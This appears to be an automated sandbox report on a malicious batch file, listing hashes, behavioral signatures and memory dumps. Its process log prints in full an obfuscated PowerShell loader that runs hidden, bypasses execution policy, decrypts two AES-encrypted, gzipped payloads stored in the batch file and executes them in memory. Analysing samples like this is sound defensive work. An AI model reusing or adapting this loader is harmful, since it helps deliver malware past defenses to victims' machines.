Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
16-06-2024 21:22
Static task
static1
Behavioral task
behavioral1
Sample
Test.bat
Resource
win7-20240220-en
4 signatures
150 seconds
General
-
Target
Test.bat
-
Size
1.6MB
-
MD5
452333fe4f4b6b505f0b2fb6a2f550f0
-
SHA1
8d609de9e202d5b99e20ec075ef65961477bdf61
-
SHA256
d384c9523b0d235f5df58134611d0c3fa2047162f651e9febf24227663c56f70
-
SHA512
98249d468a779a62e8e722505606990e122b724d938ad8082d3a1488abb7ae73b32d9735e189b5ed44e307bfa31f95ad961444afc8152cd7518efb8e3de59034
-
SSDEEP
24576:ZYCKq2OwSobHA5C+sZ4JdhYJtko4J5AY36KpwoWGRGoeiLfZr3IhKkxOPyxg10dE:5KpbUdo0AK6oWeRhS8PvbR6C
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2824 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2824 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 2496 wrote to memory of 2824 2496 cmd.exe powershell.exe PID 2496 wrote to memory of 2824 2496 cmd.exe powershell.exe PID 2496 wrote to memory of 2824 2496 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Test.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KqxeXbfDGxuEH+7Gk9Wta61SYaVxTt4rEcHNX9Nuf8I='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kgFcU3INT6PSdo5B4jsRDg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VFHTQ=New-Object System.IO.MemoryStream(,$param_var); $nikKe=New-Object System.IO.MemoryStream; $wbesJ=New-Object System.IO.Compression.GZipStream($VFHTQ, [IO.Compression.CompressionMode]::Decompress); $wbesJ.CopyTo($nikKe); $wbesJ.Dispose(); $VFHTQ.Dispose(); $nikKe.Dispose(); $nikKe.ToArray();}function execute_function($param_var,$param2_var){ $VQCvn=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $VWTPJ=$VQCvn.EntryPoint; $VWTPJ.Invoke($null, $param2_var);}$OfkGU = 'C:\Users\Admin\AppData\Local\Temp\Test.bat';$host.UI.RawUI.WindowTitle = $OfkGU;$bFszc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($OfkGU).Split([Environment]::NewLine);foreach ($rtAAn in $bFszc) { if ($rtAAn.StartsWith(':: ')) { $AKwuR=$rtAAn.Substring(3); break; }}$payloads_var=[string[]]$AKwuR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2824-4-0x000007FEF58DE000-0x000007FEF58DF000-memory.dmpFilesize
4KB
-
memory/2824-5-0x000000001B680000-0x000000001B962000-memory.dmpFilesize
2.9MB
-
memory/2824-7-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmpFilesize
9.6MB
-
memory/2824-6-0x00000000028E0000-0x00000000028E8000-memory.dmpFilesize
32KB
-
memory/2824-9-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmpFilesize
9.6MB
-
memory/2824-8-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmpFilesize
9.6MB
-
memory/2824-10-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmpFilesize
9.6MB
-
memory/2824-11-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmpFilesize
9.6MB
-
memory/2824-12-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmpFilesize
9.6MB